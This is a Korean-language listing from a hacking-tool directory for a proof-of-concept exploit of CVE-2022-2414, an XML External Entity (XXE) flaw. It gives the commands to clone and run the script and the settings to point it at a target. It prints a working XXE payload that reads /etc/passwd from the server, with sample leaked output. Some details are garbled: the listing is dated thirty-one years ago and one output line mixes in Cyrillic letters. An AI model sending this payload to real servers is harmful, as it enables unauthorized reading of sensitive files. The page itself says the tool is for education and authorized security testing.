Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-2414 — XML 외부 엔터티(XXE) 취약점 익스플로잇을 시연하기 위한 PoC 스크립트입니다. | Kitploit
도구/GitHubGitHub/geniuszly/cve-2022-2414
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubgeniuszly/cve-2022-2414

CVE-2022-2414

XML 외부 엔터티(XXE) 취약점 익스플로잇을 시연하기 위한 PoC 스크립트입니다.

저장소 보기
31년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

EN

GenXMLExternalEntityExploit는 XML External Entity (XXE) 취약점 악용을 시연하기 위한 PoC 스크립트입니다. 이 스크립트는 XML 페이로드를 사용하여 대상 서버에서 민감한 파일을 읽습니다. 보안 테스트, 침투 테스트 또는 교육 목적으로 유용할 수 있습니다.

기능

  • 지정된 서버에 조작된 XML 페이로드를 전송합니다.
  • XXE 취약점을 악용하여 서버 파일을 읽습니다.
  • 대상 URL과 페이로드 데이터를 쉽게 사용자 정의할 수 있습니다.

사용 방법

  1. 저장소 복제
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2022-2414
    
  2. 디렉토리로 이동
    root@kitploit:~
    cd CVE-2022-2414
    
  3. 스크립트 실행 컴퓨터에 Python이 설치되어 있는지 확인하십시오.
    root@kitploit:~
    python3 GenXMLExternalEntityExploit.py
    

구성

  • TARGET_URL: 스크립트의 TARGET_URL 변수를 테스트하려는 대상 서버의 URL로 업데이트하십시오.
  • XML_PAYLOAD: 특정 파일 경로 또는 서버 측 작업을 위해 스크립트의 XML_PAYLOAD 문자열을 사용자 정의하십시오.
  • HEADERS: 필요에 따라 HTTP 헤더를 수정하십시오.

예시

기본적으로 스크립트는 /etc/passwd 파일을 읽기 위해 다음 페이로드를 사용합니다:

root@kitploit:~
<!--?xml version="1.0" ?-->
<!DOCTYPE xmlData [<!ENTITY fetchFile SYSTEM "file:///etc/passwd"> ]>
<CertEnrollmentRequest>
  <Attributes/>
  <ProfileID>&fetchFile;</ProfileID>
</CertEnrollmentRequest>

예시 출력

root@kitploit:~
Инициализация отправки XML-пейлоада на сервер...
Статус-код ответа: 200
Содержимое XML-ответа:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nологin
...

면책 조항

이 도구는 교육 목적 및 승인된 보안 테스트만을 위한 것입니다. 저자는 이 도구의 불법 사용에 대해 책임을 지지 않습니다.

도구 다운로드